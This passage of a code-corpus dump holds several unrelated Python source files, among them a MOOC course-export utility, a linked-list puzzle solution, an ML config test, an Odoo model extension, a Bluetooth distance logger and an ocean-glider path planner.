group[\"size\"] = len(group[\"members\"])\n groupCollection.update({'_id': ObjectId(new_id_group)}, {\"$set\": {\"members\": group[\"members\"], \"size\": group[\"size\"]}})\n\n groupsActivityCollection = mongodb.get_db().get_collection('groups_activity')\n timestamp = int(round(time.time() * 1000))\n activity_entry = {\"id_course\": group[\"id_course\"], \"id_user\": id_user, \"former_id_group\": ObjectId(id_group), \"new_id_group\": ObjectId(new_id_group), \"timestamp\": timestamp, \"lat\": pos_lat, \"lon\": pos_lon}\n groupsActivityCollection.insert(activity_entry)\n\n# def get_course_students_csv(course):\n# course_file = StringIO.StringIO()\n#\n# course_csv = csv.writer(course_file, quoting=csv.QUOTE_ALL)\n# headers = [\"first_name\", \"last_name\", \"email\", \"language\"]\n# course_csv.writerow(headers)\n#\n# h = HTMLParser()\n# for student in course.students.all():\n# row = []\n# for field in headers:\n# fieldvalue = getattr(student, field)\n# row.append(h.unescape(fieldvalue).encode(\"utf-8\", \"replace\"))\n# course_csv.writerow(row)\n#\n# return course_file.getvalue()\n\ndef get_course_students_csv(course, studentlist):\n course_file = StringIO.StringIO()\n\n course_csv = csv.writer(course_file, quoting=csv.QUOTE_ALL)\n headers = [\"first_name\", \"last_name\", \"email\", \"language\"]\n course_csv.writerow(headers)\n\n h = HTMLParser()\n if not hasattr(studentlist[:1][0], 'student'):\n for student in studentlist:\n row = []\n try:\n language = student.get_profile().get_language_display() or _(u\"Not defined\")\n row = [\n h.unescape(student.first_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.last_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.email).encode(\"utf-8\", \"replace\"),\n h.unescape(language).encode(\"utf-8\", \"replace\"),\n ]\n except:\n continue\n course_csv.writerow(row)\n else:\n for student in studentlist:\n row = []\n try:\n language = student.get_profile().get_language_display() or _(u\"Not defined\")\n row = [\n h.unescape(student.student.first_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.student.last_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.student.email).encode(\"utf-8\", \"replace\"),\n h.unescape(language).encode(\"utf-8\", \"replace\"),\n ]\n except:\n continue\n course_csv.writerow(row)\n\n return course_file.getvalue()\n\ndef get_csv_from_students_list(course, studentlist):\n course_file = StringIO.StringIO()\n\n course_csv = csv.writer(course_file, quoting=csv.QUOTE_ALL)\n headers = [\"first_name\", \"last_name\", \"email\", \"mark\"]\n course_csv.writerow(headers)\n\n h = HTMLParser()\n if not hasattr(studentlist[:1][0], 'student'):\n for student in studentlist:\n row = []\n try:\n mark, mark_info = get_course_mark(course, student)\n row = [\n h.unescape(student.first_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.last_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.email).encode(\"utf-8\", \"replace\"),\n \"%.2f\" % mark\n ]\n except:\n continue\n course_csv.writerow(row)\n else:\n for student in studentlist:\n row = []\n try:\n mark, mark_info = get_course_mark(course, student.student)\n row = [\n h.unescape(student.student.first_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.student.last_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.student.email).encode(\"utf-8\", \"replace\"),\n \"%.2f\" % mark\n ]\n except:\n continue\n course_csv.writerow(row)\n\n return course_file.getvalue()\n\ndef get_course_teachers_csv(course):\n course_file = StringIO.StringIO()\n\n course_csv = csv.writer(course_file, quoting=csv.QUOTE_ALL)\n headers = [\"first_name\", \"last_name\", \"email\"]\n course_csv.writerow(headers)\n\n h = HTMLParser()\n for teacher in course.teachers.all():\n row = []\n for field in headers:\n fieldvalue = getattr(teacher, field)\n row.append(h.unescape(fieldvalue).encode(\"utf-8\", \"replace\"))\n course_csv.writerow(row)\n\n return course_file.getvalue()\n\ndef create_kq_activity(kq, user):\n activityCollection = mongodb.get_db().get_collection('activity')\n kq_activity = {\n \"course_id\": kq.unit.course.id,\n \"unit_id\": kq.unit.id,\n \"kq_id\": kq.id,\n \"user_id\": user.id,\n \"timestamp\": int(round(time.time() * 1000)),\n \"lat\": 0.0,\n \"lon\": 0.0\n }\n kq_key = {\n \"course_id\": kq.unit.course.id,\n \"unit_id\": kq.unit.id,\n \"kq_id\": kq.id,\n \"user_id\": user.id\n }\n activityCollection.update(kq_key, { '$setOnInsert': kq_activity}, upsert=True);\n\ndef has_user_passed_course(user, course):\n passed = False\n total_mark, units_info = get_course_mark(course, user)\n if course.threshold is not None and float(course.threshold) <= total_mark:\n passed = True\n return passed\n\ndef get_course_activity_dates_for_user(course, user):\n result = {}\n user_course = CourseStudent.objects.get(student_id=user.id, course_id=course.id)\n\n db = mongodb.get_db()\n activity = db.get_collection(\"activity\")\n last_course_activity = activity.find({\n \"user_id\": user.id,\n \"course_id\": course.id,\n }).sort(\"timestamp\", pymongo.DESCENDING).limit(1)\n\n\n if user_course.timestamp:\n result[\"enrollDate\"] = datetime.utcfromtimestamp(user_course.timestamp)\n if last_course_activity.count() > 0:\n result[\"lastViewDate\"] = datetime.utcfromtimestamp(last_course_activity[0][\"timestamp\"]/1000.0)\n\n return result\n","sub_path":"moocng/courses/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":25895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"432093746","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n # 退出条件\n if k == 0 or k == 1:\n return head\n\n def get_length(head):\n length = 0\n while head:\n head = head.next\n length += 1\n return length\n\n length = get_length(head)\n\n def reverse(head, l):\n first = head\n second = head.next\n while l:\n temp = second.next\n second.next = first\n first = second\n second = temp\n l -= 1\n return first, second\n\n n = length / k\n begin = head\n last = None\n for i in range(n):\n first, second = reverse(begin, k - 1)\n if i == 0:\n head = first\n else:\n last.next = first\n last = begin\n begin.next = second\n begin = second\n return head\n\n\n\n\n","sub_path":"codes/Aiamjay/Week1-Day4/25. Reverse Nodes in k-Group.py","file_name":"25. Reverse Nodes in k-Group.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"627318070","text":"import copy\n\nimport pytest\n\nfrom ludwig.constants import TRAINING, HYPEROPT\nfrom ludwig.utils.defaults import merge_with_defaults, default_training_params\nfrom tests.integration_tests.utils import binary_feature, category_feature, \\\n numerical_feature, text_feature, sequence_feature, vector_feature\n\n\nHYPEROPT_CONFIG = {\n \"parameters\": {\n \"training.learning_rate\": {\n \"space\": \"loguniform\",\n \"lower\": 0.001,\n \"upper\": 0.1,\n },\n \"combiner.num_fc_layers\": {\n \"space\": \"randint\",\n \"lower\": 2,\n \"upper\": 6\n },\n \"utterance.cell_type\": {\n \"space\": \"grid_search\",\n \"values\": [\"rnn\", \"gru\"]\n },\n \"utterance.bidirectional\": {\n \"space\": \"choice\",\n \"categories\": [True, False]\n },\n \"utterance.fc_layers\": {\n \"space\": \"choice\",\n \"categories\": [\n [{\"fc_size\": 512}, {\"fc_size\": 256}],\n [{\"fc_size\": 512}],\n [{\"fc_size\": 256}],\n ]\n }\n },\n \"sampler\": {\"type\": \"ray\"},\n \"executor\": {\"type\": \"ray\"},\n \"goal\": \"minimize\"\n}\n\nSCHEDULER = {'type': 'async_hyperband', 'time_attr': 'time_total_s'}\n\ndefault_early_stop = default_training_params['early_stop']\n\n\n@pytest.mark.parametrize(\"use_train,use_hyperopt_scheduler\", [\n (True,True),\n (False,True),\n (True,False),\n (False,False),\n])\ndef test_merge_with_defaults_early_stop(use_train, use_hyperopt_scheduler):\n all_input_features = [\n binary_feature(),\n category_feature(),\n numerical_feature(),\n text_feature(),\n ]\n all_output_features = [\n category_feature(),\n sequence_feature(),\n vector_feature(),\n ]\n\n # validate config with all features\n config = {\n 'input_features': all_input_features,\n 'output_features': all_output_features,\n HYPEROPT: HYPEROPT_CONFIG,\n }\n config = copy.deepcopy(config)\n\n if use_train:\n config[TRAINING] = {'batch_size': '42'}\n\n if use_hyperopt_scheduler:\n # hyperopt scheduler cannot be used with early stopping\n config[HYPEROPT]['sampler']['scheduler'] = SCHEDULER\n\n merged_config = merge_with_defaults(config)\n\n expected = -1 if use_hyperopt_scheduler else default_early_stop\n assert merged_config[TRAINING]['early_stop'] == expected\n","sub_path":"tests/ludwig/utils/test_defaults.py","file_name":"test_defaults.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"126743687","text":"############################################################################\r\n#\r\n# SAGE UI - A Graphical User Interface for SAGE\r\n# Copyright (C) 2005 Electronic Visualization Laboratory,\r\n# University of Illinois at Chicago\r\n#\r\n# All rights reserved.\r\n# \r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions are met:\r\n# \r\n# * Redistributions of source code must retain the above copyright\r\n# notice, this list of conditions and the following disclaimer.\r\n# * Redistributions in binary form must reproduce the above\r\n# copyright notice, this list of conditions and the following disclaimer\r\n# in the documentation and/or other materials provided with the distribution.\r\n# * Neither the name of the University of Illinois at Chicago nor\r\n# the names of its contributors may be used to endorse or promote\r\n# products derived from this software without specific prior written permission.\r\n# \r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\r\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\r\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\r\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\r\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\r\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\r\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\r\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\r\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\r\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n#\r\n# Direct questions, comments etc about SAGE UI to www.evl.uic.edu/cavern/forum\r\n#\r\n# Author: Ratko Jagodic\r\n# \r\n############################################################################\r\n\r\nimport sys, string\r\n\r\n### Class to hold all the performace information\r\n### Instance of this class has to be created for every app instance ID on SAGE\r\nclass sageAppPerfInfo:\r\n\r\n def __init__(self) :\r\n self.displayArray = {}\r\n self.renderArray = {}\r\n self.dataArray = {}\r\n \r\n self.displayArray['bandWidth'] = self.__zerosHash(30)\r\n self.displayArray['frameRate'] = self.__zerosHash(30)\r\n self.displayArray['nodes'] = self.__zerosHash(30)\r\n self.displayArray['cpu'] = self.__zerosHash(30)\r\n self.displayArrayIndex = 0\r\n\r\n self.renderArray['bandWidth'] = self.__zerosHash(30)\r\n self.renderArray['frameRate'] = self.__zerosHash(30)\r\n self.renderArray['nodes'] = self.__zerosHash(30)\r\n self.renderArray['cpu'] = self.__zerosHash(30)\r\n self.renderArrayIndex = 0\r\n\r\n self.dataArray['bandWidth'] = self.__zerosHash(30)\r\n self.dataArray['nodes'] = self.__zerosHash(30)\r\n self.dataArray['cpu'] = self.__zerosHash(30)\r\n self.dataArrayIndex = 0\r\n\r\n #### Set the display performance Info\r\n #### @arg bandwidth Bandwidth\r\n #### @arg frameRate Frame rate\r\n #### @arg nodes Number of nodes\r\n #### @arg cpuUsage CPU utilisation\r\n def setDisplayPerfInfo(self, bandWidth, frameRate, nodes, cpuUsage):\r\n if (self.displayArrayIndex >= 30):\r\n self.displayArrayIndex = 0\r\n\r\n self.displayArray['bandWidth'][self.displayArrayIndex % 30] = bandWidth\r\n self.displayArray['frameRate'][self.displayArrayIndex % 30] = frameRate\r\n self.displayArray['nodes'][self.displayArrayIndex % 30] = nodes\r\n self.displayArray['cpu'][self.displayArrayIndex % 30] = cpuUsage\r\n\r\n self.displayArrayIndex = self.displayArrayIndex + 1\r\n\r\n\r\n\r\n #### Set the rendering performance Info\r\n #### @arg bandwidth Bandwidth\r\n #### @arg frameRate Frame rate\r\n #### @arg nodes Number of nodes\r\n #### @arg cpuUsage CPU utilisation\r\n def setRenderPerfInfo(self, bandWidth, frameRate, nodes, cpuUsage):\r\n if (self.renderArrayIndex >= 30):\r\n self.renderArrayIndex = 0\r\n\r\n self.renderArray['bandWidth'][self.renderArrayIndex] = bandWidth\r\n self.renderArray['frameRate'][self.renderArrayIndex] = frameRate\r\n self.renderArray['nodes'][self.renderArrayIndex] = nodes\r\n self.renderArray['cpu'][self.renderArrayIndex] = cpuUsage\r\n\r\n self.renderArrayIndex = self.renderArrayIndex + 1\r\n\r\n\r\n\r\n #### Get display information based on the specified item\r\n #### @arg interval No of values required (max = 30)\r\n #### @return Returns an array\r\n def getDisplayInformation(self, stItemName, interval):\r\n\r\n if (interval > 30 or interval < 0):\r\n print ('Out of bound range specified')\r\n return 0\r\n newArray = self.__zerosHash(interval) #zeros(type='Float32', shape=interval)\r\n newArrayIndex = self.displayArrayIndex - 1\r\n\r\n for x in range(0, interval):\r\n if newArrayIndex < 0:\r\n newArrayIndex = 29\r\n\r\n newArray[x] = self.displayArray[ stItemName ][newArrayIndex]\r\n newArrayIndex = newArrayIndex - 1\r\n\r\n return newArray\r\n\r\n\r\n\r\n #### Get rendering information based on the specified item\r\n #### @arg interval No of values required (max = 30)\r\n #### @return Returns an array\r\n def getRenderInformation(self, stItemName, interval):\r\n\r\n if (interval > 30 or interval < 0):\r\n print ('Out of bound range specified')\r\n return 0\r\n newArray = self.__zerosHash(interval) #zeros(type='Float32', shape=interval)\r\n newArrayIndex = self.renderArrayIndex - 1\r\n\r\n for x in range(0, interval):\r\n\r\n if newArrayIndex < 0:\r\n newArrayIndex = 29\r\n\r\n newArray[x] = self.renderArray[ stItemName ][newArrayIndex]\r\n newArrayIndex = newArrayIndex - 1\r\n \r\n return newArray\r\n\r\n\r\n # creates a hash of size \"size\" and initializes all the values to 0\r\n def __zerosHash(self, size):\r\n h = {}\r\n for i in range(0, size):\r\n h[i] = 0\r\n return h\r\n","sub_path":"ui/sageAppPerfInfo.py","file_name":"sageAppPerfInfo.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"321432579","text":"\"\"\"\nAuthor: Bruno Luca\nDate: 12-09-2020\nTitle: invert dictionary\n\"\"\"\n\ndef invert_dictionary_mapping(d):\n invert = {}\n\n for key,value in d.items():\n invert.setdefault(value,[]).append(key)\n return invert\n\n\ndef main():\n initial_mapping = dict(a = 1, b = 2, c = 3, z = 1)\n\n print(f\"Before map inverting:\\n\\t{initial_mapping}\")\n print(f\"\\n\\nAfter map inverting:\\n\\t{invert_dictionary_mapping(initial_mapping)}\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"tpsit_IV/summer_works/es11_2.py","file_name":"es11_2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"161570916","text":"from datetime import datetime\nfrom bluepy.btle import Scanner\n\ndateTimeObj = datetime.now() #determines timestamp for filename\n\t\nfilename = dateTimeObj.strftime(\"%d_%H:%M\") #string for the filename (day hour:minute)\nf = open(str(filename) + \".txt\", \"w\") #creates a file\nf.close()\n\nwhile True:\n\tscanner = Scanner()\n\tdevices = scanner.scan(1.0) #scans for one second\n\t\n\tdateTimeObj = datetime.now() #determines timestamp\n\t\n\tfor device in devices: #loop over all detected devices\n\t\t\n\t\tdistance = (-3.55889 * device.rssi -121.75286)/100 #transforms RSSI into meters\n\t\t\n\t\tif distance < 1: #not enough distance!\n\t\t\ttimestamp = dateTimeObj.strftime(\"%Y/%b/%d %H:%M:%S.%f\") #timestamp strink\n\t\t\toutput = {timestamp : distance} #dictionary with timestamp and distance\n\t\t\t\n\t\t\tf = open(str(filename) + \".txt\", \"a\") #opens file\n\t\t\tf.write(str(output) + '\\n') #appends string to file\n\t\t\tf.close()\n\t\t\t\n\t\t\tprint(output) #prints dictionary written to file\n\t\t\n\t\telse: #safe distance\n\t\t\tpass\n","sub_path":"distancing.py","file_name":"distancing.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"288063256","text":"from mantid.simpleapi import *\nimport ncs\n\nforward_banks = ((135, 142), (143, 150), (151, 158), (159, 166),\n (167, 174), (175, 182), (183, 190), (191, 198))\n\n\nruns = \"15039-15045\"\nspectra = []\nfor srange in forward_banks:\n spectra.append(\"{0}-{1}\".format(*srange))\nspectra = \";\".join(spectra)\nsum_spectra = True\ndiff_type=\"SingleDifference\" # Allowed values=Single,Double,Thick\nip_file = \"IP0004_10.par\"\n\n## Define fitting options ##\nfit_options = ncs.FitOptions()\nfit_options.smooth_points = None\nfit_options.bad_data_error = 1e6\nfit_options.background_order = None # None to switch off\n\n# Mass options\nmass1 = {'value':1.0079, 'widths':[2,5,7], 'function':'GramCharlier',\n 'hermite_coeffs':[1,0,0],'k_free':False, 'sears_flag':1}\nmass2 = {'value':16.0, 'widths':10, 'function':'Gaussian'}\nmass3 = {'value':27.0, 'widths':13, 'function':'Gaussian'}\nmass4 = {'value':133.0, 'widths':30, 'function':'Gaussian'}\n\nfit_options.masses = [mass1, mass2, mass3, mass4]\n\n## Intensity constraints\nfit_options.constraints = ([0,1,0,-4])\n\n\n## Load data & preprocess ##\n\ntof_data = LoadVesuvio(Filename=runs, SpectrumList=spectra,\n Mode=diff_type,InstrumentParFile=ip_file,SumSpectra=sum_spectra)\ntof_data = CropWorkspace(tof_data,XMin=50.0,XMax=562.0)\ntof_data = ncs.preprocess(tof_data, fit_options)\n\n## Run fitting ##\nfitted_ws, fitted_params = [], []\nfor idx in range(tof_data.getNumberHistograms()):\n fit_options.workspace_index = idx\n reduced_chi_square, params_ws = ncs.run_fit(tof_data, fit_options)\n fitted_ws.append(\"fit_%d\" % (idx+1))\n RenameWorkspace(\"fit_Workspace\", OutputWorkspace=fitted_ws[-1])\n fitted_params.append(\"params_%d\" % (idx+1))\n RenameWorkspace(\"fit_Parameters\", OutputWorkspace=fitted_params[-1])\n\n# Group\nfitted_data= GroupWorkspaces(fitted_ws)\nfitted_pars = GroupWorkspaces(fitted_params)\n\n## Print results to screen ##\n#ncs.display_fit_output(reduced_chi_square, params_ws,fit_options)\n","sub_path":"development/inelastic/vesuvio_user/ncs/CsHS204.py","file_name":"CsHS204.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"564126066","text":"import ParameterClasses as P\nimport MarkovModel as MarkovCls\nimport SupportMarkovModel as SupportMarkov\n\n# simulate no therapy\n# create a cohort\ncohort_none = MarkovCls.Cohort(id=0, therapy=P.Therapies.NONE)\n# simulate cohort\nsimOutputs_NONE = cohort_none.simulate()\n\n# simulate anticoagulation therapy\ncohort_anticoag = MarkovCls.Cohort(id=1, therapy=P.Therapies.ANTICOAG)\nsimOutputs_ANTICOAG = cohort_anticoag.simulate()\n\nSupportMarkov.draw_survival_curves_and_histograms(simOutputs_NONE, simOutputs_ANTICOAG)\n\nSupportMarkov.print_outcomes(simOutputs_NONE, \"No therapy\")\nSupportMarkov.print_outcomes(simOutputs_ANTICOAG, \"Anticoagulation theraoy\")\n\nSupportMarkov.print_comparative_outcomes(simOutputs_NONE, simOutputs_ANTICOAG)\n\nSupportMarkov.report_CEA_CBA(simOutputs_NONE, simOutputs_ANTICOAG)\n","sub_path":"ComparativeOutcomes.py","file_name":"ComparativeOutcomes.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"528168656","text":"import numpy as np\n\nfrom tensorflow.python.keras import Model\nfrom tensorflow.python.keras.layers import Input, Concatenate, Lambda\n\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras.layers import Layer\n\nimport tensorflow as tf\n\nANTIDIAG12 = np.array([[[[1 if i + j == 3 else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nANTIDIAG13 = np.array([[[[1 if i + k == 3 else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nANTIDIAG23 = np.array([[[[1 if j + k == 3 else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nFULLDIAG1 = np.array([[[[1 if i == j == k else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nFULLDIAG2 = np.array([[[[1 if i == j == 3 - k else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nFULLDIAG3 = np.array([[[[1 if i == 3 - j == k else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nFULLDIAG4 = np.array([[[[1 if 3 - i == j == k else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\n\ndef greater3_on_axis(x, axis):\n x = K.sum(x, axis=axis)\n x = K.greater(x, 3)\n x = K.any(x)\n return x\n\n\ndef greater3(x):\n # x = K.print_tensor(x, 'input: ')\n x1 = greater3_on_axis(x, 1)\n x2 = greater3_on_axis(x, 2)\n x3 = greater3_on_axis(x, 3)\n x = K.stack([x1, x2, x3])\n # x = K.print_tensor(x, 'output: ')\n return K.any(x)\n\n\ndef diaggreater3_on_axis(x, i, j, k):\n assert j < k\n # x = tf.Print(x, [x], summarize=64, message='initial x: ')\n diag = tf.diag(np.array([1, 1, 1, 1], dtype=np.int32))\n # x = tf.Print(x, [diag], summarize=64, message='diagnonal: ')\n diag = K.stack([diag, diag, diag, diag], axis=i)\n # x = tf.Print(x, [diag], summarize=64, message='diagnonal: ')\n x = x * diag\n # x = tf.Print(x, [x], summarize=64, message='x * diag: ')\n x = K.sum(x, axis=k+1)\n # x = tf.Print(x, [x], summarize=64, message='x after first sum: ')\n x = K.sum(x, axis=j+1)\n # x = tf.Print(x, [x], summarize=64, message='x after second sum: ')\n x = K.greater(x, 3)\n x = K.any(x)\n return x\n\n\ndef diaggreater3(x):\n # x = K.print_tensor(x, 'input: ')\n x1 = diaggreater3_on_axis(x, 0, 1, 2)\n x2 = diaggreater3_on_axis(x, 1, 0, 2)\n x3 = diaggreater3_on_axis(x, 2, 0, 1)\n x = K.stack([x1, x2, x3])\n # x = tf.Print(x, [x], summarize=64, message='diagonals: ')\n return K.any(x)\n\n\ndef antidiaggreater3(x):\n x1 = x * tf.constant(ANTIDIAG23)\n x1 = K.sum(x1, axis=2)\n x1 = K.sum(x1, axis=2)\n x1 = K.greater(x1, 3)\n x1 = K.any(x1)\n\n x2 = x * tf.constant(ANTIDIAG13)\n x2 = K.sum(x2, axis=2)\n x2 = K.sum(x2, axis=2)\n x2 = K.greater(x2, 3)\n x2 = K.any(x2)\n\n x3 = x * tf.constant(ANTIDIAG12)\n x3 = K.sum(x3, axis=2)\n x3 = K.sum(x3, axis=2)\n x3 = K.greater(x3, 3)\n x3 = K.any(x3)\n\n x = K.stack([x1, x2, x3])\n return K.any(x)\n\n\ndef fulldiaggreater3(x):\n xs = []\n for filt in [FULLDIAG1, FULLDIAG2, FULLDIAG3, FULLDIAG4]:\n x1 = x * tf.constant(filt)\n x1 = K.sum(x1, axis=1)\n x1 = K.sum(x1, axis=1)\n x1 = K.sum(x1, axis=1)\n x1 = K.greater(x1, 3)\n xs.append(x1)\n\n x = K.stack(xs)\n return K.any(x)\n\n\ndef is_winning(x):\n return K.any(K.stack([greater3(x), diaggreater3(x), fulldiaggreater3(x)]))\n\n\nINPUTS = Input(shape=(4, 4, 4), dtype='int32')\n\nMODEL = Model(INPUTS, Lambda(is_winning)(INPUTS))\n\n\ndef evaluate(state: np.ndarray) -> np.ndarray:\n return MODEL.predict(state)[0]\n","sub_path":"ai/mcts/tf_sogo.py","file_name":"tf_sogo.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"189336510","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass cust_form_custom(models.Model):\n _inherit = 'res.partner'\n\n father_name = fields.Char(string=\"Father/Husband's Name\")\n cnic_no = fields.Char(string=\"CNIC #\")\n postal_address = fields.Text(string=\"Postal Address\")\n mobile_no = fields.Char(string=\"Mobile\")\n phone_office = fields.Char(string=\"Phone Number (Office)\")\n phone_res = fields.Char(string=\"Phone Number (Res)\")\n nom_name = fields.Char(string=\"Name\")\n nom_father_name = fields.Char(string=\"Father / Husband /Guardian\")\n nom_cnic = fields.Char(string=\"CNIC#\")\n nom_blood_rel = fields.Char(string=\"Blood Relation\")\n photograph = fields.Binary(string=\"2 Passport Size photographs\")\n cnic_copy = fields.Binary(string=\"CNIC Copy\")\n nom_photo_cnic = fields.Binary(string=\"Nominated Person's CNIC Copy\")\n\n\n\n\n @api.multi\n def import_photograph(self):\n fileobj = TemporaryFile('w+')\n fileobj.write(base64.decodestring(photograph))\n return\n\n def import_cnic_copy(self):\n fileobj = TemporaryFile('w+')\n fileobj.write(base64.decodestring(cnic_copy))\n return\n \n def import_nom_photo_cnic(self):\n fileobj = TemporaryFile('w+')\n fileobj.write(base64.decodestring(nom_photo_cnic))\n return\n\n\n\nclass prod_tmp_custm(models.Model):\n _inherit = 'product.template'\n\n plot_no = fields.Integer(string=\"Plot Number\")\n street_no = fields.Integer(string=\"Street Number\")\n plot_priority = fields.Char(string=\"Plot Priority\")\n normal = fields.Boolean(string=\"Normal\")\n corner = fields.Boolean(string=\"Corner (Extra 10 %)\")\n boulevard = fields.Boolean(string=\"Boulevard (10%)\")\n park_facing = fields.Boolean(string=\"Park Facing (Extra 10%)\")\n extra_land = fields.Char(string=\"Extra Land\")\n extra_price = fields.Float(string=\"Extra Price\")\n total_price = fields.Float(string=\"Total Price\")\n\n\n","sub_path":"crowncity/crowncity/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"548724284","text":"'''\n This file tests the GOTO_LXY.MA file creation aspects of GliderFileTools\n'''\nfrom gpplib.GliderFileTools import *\nimport random\nfrom sets import Set\nimport gpplib\nfrom gpplib.Utils import *\nfrom gpplib.GenGliderModelUsingRoms import *\nfrom gpplib.SA_Replanner import *\nfrom gpplib.LatLonConversions import *\n\n''' Code for a simple planner. Here we use a Min-Expected-Risk planner.\n'''\ndef GetPathFromStartToGoal(start,goal):\n sp_mst,dist = sarp.GetShortestPathMST(goal)\n path_to_goal=sp_mst['(%d,%d)'%(start[0],start[1])]['(%d,%d)'%(goal[0],goal[1])]\n return path_to_goal\n\n''' Come up with a sample plan... '''\nconf = gpplib.Utils.GppConfig()\nyy,mm,dd,numDays = 2011,2,1,2\nstart,goal=(0,6),(8,1)\n \nsarp = SA_Replanner(conf.myDataDir+'RiskMap.shelf',conf.myDataDir+'roms/')\n#sarp.GetTransitionModelFromShelf(yy,mm,dd,numDays,0.1,0.01,conf.myDataDir+'NoisyGliderModels2')\nu,v,time1,depth,lat,lon = sarp.GetRomsData(yy,mm,dd,numDays)\n#sarp.CreateExpRiskGraph() # Run a Min-Exp-Risk replanner\nsarp.CreateMinRiskGraph()\npath_to_goal = GetPathFromStartToGoal(start,goal)\n\n\n''' Code to write out a goto_lXY.ma file. Here we are going to write out to GOTO_L16.MA\n'''\n\n# Create our own .MA file from scratch.\nnew_goto_beh = GotoListFromGotoLfileGliderBehavior()\n\ngldrEnums=GliderWhenEnums()\nnew_goto_beh.SetNumLegsToRun(gldrEnums.num_legs_to_run_enums['TRAVERSE_LIST_ONCE'])\nnew_goto_beh.SetStartWhen(gldrEnums.start_when_enums['BAW_IMMEDIATELY'])\nnew_goto_beh.SetStopWhen(gldrEnums.stop_when_enums['BAW_WHEN_WPT_DIST'])\nnew_goto_beh.SetInitialWaypoint(gldrEnums.initial_wpt_enums['CLOSEST'])\n\nllconv = LLConvert()\nw_lat,w_lon = [],[]\nfor loc in path_to_goal:\n x,y = sarp.gm.GetXYfromNodeStr(loc)\n lat,lon = sarp.gm.GetLatLonfromXY(x,y)\n wlat, wlon = llconv.DecimalDegToWebb(lat,lon)\n w_lat.append(wlat); w_lon.append(wlon)\nnew_goto_beh.SetWaypointListInWebbCoods(w_lat,w_lon)\nAutoGenerateGotoLLfile(new_goto_beh,16)\n\n''' Might want to go to http://cinaps.usc.edu/gliders/waypoints.php to test the output GOTO_L16.MA file.\n'''","sub_path":"GliderDataPython/debugGotoLLfileCreation.py","file_name":"debugGotoLLfileCreation.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
